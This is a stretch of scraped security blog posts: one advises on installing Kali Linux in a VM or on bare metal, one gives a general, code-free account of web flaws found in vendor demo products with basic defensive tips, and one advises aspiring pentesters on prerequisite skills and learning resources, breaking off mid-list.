planning to use GNOME as your default desktop environment, you will need more
RAM. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />I recommend
XFCE, because you are a pentester and not a designer.<br />
If you want something cute, forget Kali and install Hannah Montana Linux:
http://hannahmontana.sourceforge.net/ -> just to help you! (:<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>-
Performance: </b><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">If you
follow the requirements, the likelihood of facing problems is very low.
Nowadays machines have very powerful processors and plenty of memory and disk
space, so it is easy to allocate some of these resources to a VM. However, if
your machine does not have good hardware specifications (maybe it is time to
throw it away and buy a new one), I recommend a bare-metal installation. <br /><br />This
way Kali is able to use all of the machine's hardware resources, without
sharing them with another OS. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>- System
restoring and backup</b><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">If you have
minimal virtualization skills, you know that backing up and restoring a virtual
machine is easier than a bare-metal installation: you only need to copy
a couple of files and that's it. <br /><br />You can also revert to the last snapshot, and the
system will be up again in a few minutes or less.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">When a bare-metal
installation breaks, you need to check logs, files, disk health and so on, or, in
the worst case, reinstall the system. That is really not a good thing when you
are on site at a customer, for example. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>-Mobility</b><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">If you have
dedicated hardware for performing pentests for customers, it is a good idea to run it
bare metal. However, you may face some hardware compatibility problems, which are discussed in the next topic.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />Nevertheless,
if you don't have dedicated hardware and carrying a notebook is not an
option, you can use the OVF format (https://en.wikipedia.org/wiki/Open_Virtualization_Format). <br />Just put the file on a
pendrive and import it into VirtualBox or VMware, for example. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />Another
option is to create a bootable pendrive; mobility in this
case is also easier than carrying a notebook in your bag all the time.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />Here are
the links related to the USB install:<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><a href="http://docs.kali.org/downloading/kali-linux-live-usb-install">http://docs.kali.org/downloading/kali-linux-live-usb-install</a><br />
<a href="http://docs.kali.org/downloading/kali-linux-live-usb-persistence">http://docs.kali.org/downloading/kali-linux-live-usb-persistence</a><br />
<br />
One more, though less powerful, option is to install Kali on your mobile device;
there is a special Kali edition called NetHunter
(https://www.kali.org/kali-linux-nethunter/) for this purpose.<br />Alternatively, you can
do a chroot installation
(https://www.kali.org/tutorials/kali-linux-android-linux-deploy/).<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />These last
two cases are very useful when you are performing a pentest with very restricted
device access, I mean, when the customer does not allow you to bring your notebook inside the
company. Normally mobile devices are allowed, and pendrives are very
easy to hide. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>-Hardware
compatibility</b><o:p></o:p></span></div>
If you don't want to face hardware problems, the best way is to use a virtual system. <div class="MsoNormal">
<span lang="EN-US">Only one
problem from my point of view (and it is not that much of a problem): <br />you are not
able to use your GPU to crack passwords. </span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />You are still able to crack inside the VM,
but certainly not at the same speed. <br />However, passwords
can be cracked from your normal Linux/Windows installation, so don't use this
"problem" as an excuse to install Kali bare metal and look cool
to your friends.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />For Wi-Fi
penetration tests, some years ago I had some problems because VMware and VirtualBox
didn't have nice USB management; nowadays that is already fixed. <br />Basically 99% of
the problems with Wi-Fi pentesting happen because the Wi-Fi card does not support
packet injection, so check that before buying a Wi-Fi adapter.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><u><b>Conclusion:
</b></u><br /><br /><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">A virtualized Kali will work pretty nicely for you, covering almost all cases.<br />If it is not
performing satisfactorily, maybe you did something wrong.<o:p></o:p></span></div>
<br />
<div class="MsoNormal">
<span lang="EN-US">I probably
didn't cover all the possibilities in this article, but I hope it helps you choose the best way
to install your Kali.<o:p></o:p></span></div>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2185986060583872831.post-72236026365038236502016-05-18T01:44:00.002-07:002016-05-18T01:53:10.193-07:00 Compromising Security using Online Products<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
A big Hi to the online world out there! Since I don't write much, let me first introduce myself. My name is Bikramaditya Guha aka PhoenixX and I'm an Indian computer enthusiast. These days I mostly work with information security, with a special interest in web applications. If you let me, I'll find my way into your site or application, hopefully before the bad guys do. You can find a little more about me by visiting my <a href="https://www.linkedin.com/in/bikramaditya">LinkedIn</a> profile.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It's very common these days to find and exploit zero-days. Some of them are really intriguing, given the popularity of the products and how widely they are used.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It has been observed that a lot of costly products (and by that I mean really costly) sold to the general public and to corporations are not tested for security or, to say the least, are tested negligently. It's 2016 and security still serves only as a means to fulfill compliance requirements. Everybody seems to be in a hurry to release the product to the end users. It seems like money is still more important than an individual's personal data.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Today I want to share a tale about how I started popping shells across multiple demo products (mostly PHP based). Like all good tales, this one also begins a long time ago (actually, about a year ago).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Given that every organization and individual is becoming increasingly dependent on a one-click solution for all their problems, multiple (small and big) vendors are springing up with online solutions/products to take the pressure off the big MNCs. Though it saves you a lot of money, it raises a troubling question.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Are the products really secure? Do they really care about the reputation you carry? Or is it just a sprint for money?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
These questions really raise an eyebrow (being paranoid helps when it comes to personal data), so I decided to explore these products from a security perspective. And guess what!!! I felt like I could train junior pentesters to be hackers by using the online demos the vendors offer as a training ground. Or, in short, nobody gives a 'Fish' about security. There's an open, vulnerable world out in the wild ready to be PWNED.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In my recent research, I have observed that a lot of popular products (CMS, LMS, WMS, etc.) widely used in the market are prone to some serious vulnerabilities. 6 out of 10 major organizations which use these products are vulnerable to flaws which include, but are not limited to, SQL Injection, Remote Code Execution, LFI, XXE, XSS, etc. This is just a small example considering the enormousness of the online world.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The web's architecture, having become so important that many confuse it with the internet itself, is also problematic from a security standpoint. The web uses a client-server architecture on top of the internet, which is a peer-to-peer network. Both pass messages asynchronously; essentially, the web is a file transfer system.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Each time you visit a website, you open a door into your computer through which the site can send files. These files have been used by criminals and other evildoers to harm computer users.</div>
<ul style="text-align: left;">
<li style="text-align: justify;">Your identity can be stolen for financial fraud.</li>
<li style="text-align: justify;">You can be redirected to phony sites and sold fake products.</li>
<li style="text-align: justify;">Your computer can be controlled for nefarious schemes using vulnerabilities in Flash and Java.</li>
</ul>
<div style="text-align: justify;">
Worse, the peer-to-peer nature of the internet means that a network is only as secure as its weakest link. Too often, network administrators and users are complacent about a computer or website because it is, by itself, insignificant. Why add SSL to a test website on a minor project? Why add a firewall to a computer that does not hold significant data?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
These questions are often answered the hard way. When hackers gain access to one computer on a network, they can work their way onto other computers on the network. Drop a sniffer on one computer and you can eventually identify the login credentials to access other computers. With patience and persistence, hackers can move from a low-priority computer with minimal access rights to more important computers with higher levels of access. Get root privileges, own the system/server. There's a hell of a lot of other things a hacker is equipped with to throw at your personally owned, beloved system. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The main purpose of this article is to instill in individuals the necessity and importance of security in whatever they do or try to do online, be it using an online product, surfing the internet, or playing online games. Being cautious doesn't hurt. It definitely helps against such sophisticated and cleverly planned attacks. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In my work experience, I just don't see organizations or individuals paying much heed to security. So, in case you find this article interesting, I would recommend a few things that might help you improve security (only if you care enough).</div>
<ol style="text-align: left;">
<li style="text-align: justify;">Protect your network with a robust hardware-based firewall, at the same time keep personal firewalls on all computers. A layered approach to network security is essential.</li>
<li style="text-align: justify;">Use remote management tools to ensure that all computers on your network have an up-to-date firewall and antivirus program, correctly configured.</li>
<li style="text-align: justify;">Restrict users' rights to install software. I hate this myself, but it is important. When you give everyone installation rights, you are giving them to the malware they download!</li>
<li style="text-align: justify;">Use Firefox instead of Internet Explorer. It may not be practical to migrate away from Windows, but you can do a lot of good by using the much more secure Firefox.</li>
<li style="text-align: justify;">Identify and secure all access points, no matter how seemingly insignificant. Every website and every FTP server that can be accessed via the public internet needs to be secured and monitored for compromise.</li>
<li style="text-align: justify;">Require strong passwords for your computers and applications. This is another one I hate, but weak passwords are the best friend of every hacker.</li>
<li style="text-align: justify;">Last but not least! Watch over your shoulder.</li>
</ol>
<div style="text-align: justify;">
Given the nature of the internet, network security is a never ending battle that requires constant vigilance. Best of luck….</div>
</div>
Anonymoushttp://www.blogger.com/profile/16674553366705399324noreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-59357628001603568732016-05-01T06:40:00.015-07:002023-02-10T08:03:08.190-08:00Wanna be pentester<p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Hi guys!</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>So, if you are reading this, I'm dead! 
Lol kidding.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Seriously now, if you are reading this, you are trying to become a pentester and not a stupid teenager who just wants to run a tool and tell his friends that he is a hacker.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Also, if you are concerned/complaining about the icon size on your desktop, your sound card is not working in Kali Linux, or you are too lazy to read it, go back to your everyday life. 
You don't have the pentester/hacker soul.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>If you are still reading at this point, I already suppose that you have at least the basic knowledge of:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- Linux operation and management</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; 
background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- Windows operation and management</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- Some programming skills (Perl, Python, Ruby, JavaScript); also, for web pentests, HTML is required, even though it isn't a programming language</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- Basic network knowledge (TCP/IP, ICMP) / network services (proxy, VPN, Samba, AD)</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 
0pt;"><span>- Protocols like HTTP, FTP, DNS, SSH</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- SQL (DDL, DML, and so on), MySQL, SQL Server, Postgres, Oracle.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- NoSQL - MongoDB, and others.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: 
initial; margin-bottom: 0pt; margin-top: 0pt;"><span>If you don't have these skills, don't try to get into the security world at this moment, or you will get frustrated. You will need a lot of reading before you can start it.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Don't think just installing Kali Linux on your machine magically makes you a pentester. 
It takes time, and to be honest, a lot of time!</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>If you want to learn Linux, don't start with Kali for the following reasons: http://docs.kali.org/introduction/should-i-use-kali-linux. Basically, these lines: "The fact of the matter is, however, that Kali is a Linux distribution specifically geared towards professional penetration testers and security specialists, and given its unique nature, it is NOT a recommended distribution if you're unfamiliar with Linux or are looking for a general-purpose Linux desktop distribution for development, web design, gaming, etc."</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; 
background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>The most important thing is: Know how things work.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>I will not discuss the guys who use SET to grab Facebook credentials. I know a lot of "hackers" who can dump entire databases, but they don't even know how a SELECT or CREATE TABLE statement works, or guys who can take down a server, but they don't even know what an ICMP type 8 is. I felt sick writing this last sentence…</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>So, don't be big-headed. 
Just executing tools does not make you a hacker/pentester. Start your studies correctly.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Don't be a simple, stupid script kiddie. These guys are jokes in the security world. Do you wanna be like these guys? I don't think so.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>And another tip: Don't think that everything is free. 
You'll need to save money to buy books, training, or certifications.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>There is a lot of training available on the internet. I'm saving some time for you:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Here are some books and links to start (I put them in the order that I think is the best way to learn, feel free to choose the best way for you):</span></span></p><p style="background-attachment: initial; 
background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://en.wikipedia.org/wiki/Modern_Operating_Systems</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://iips.icci.edu.iq/images/exam/Computer-Networks---A-Tanenbaum---5th-edition.pdf</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 
0pt;"><span>http://www.amazon.com/HTTP-Definitive-Guide-Guides/dp/1565925092</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.edx.org/course/introduction-linux-linuxfoundationx-lfs101x-0</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://linuxacademy.com/linux</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://linux-training.be/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; 
background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.htmlandcssbook.com/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://en.wikiversity.org/wiki/Programming_Logic</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.python.org/about/gettingstarted/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; 
background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.perl.org/books/beginning-perl/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.sqlcourse.com/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://go.dev/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; 
background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Now you have at least 6 months of studying ahead, and you can find more related training. Remember, Google is your friend.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>I ALREADY HAVE THE SKILLS (Really? 
Double check it)</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>So, if you already have the required skills, there are some excellent references that you can use to get into IT security. Still, first, you should select one area and move to another one after you have mastered it (my recommendation). However, sometimes you have to mix them to get better results. 
Some security areas (it's not an exhaustive list):</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Web Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Network Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Mobile 
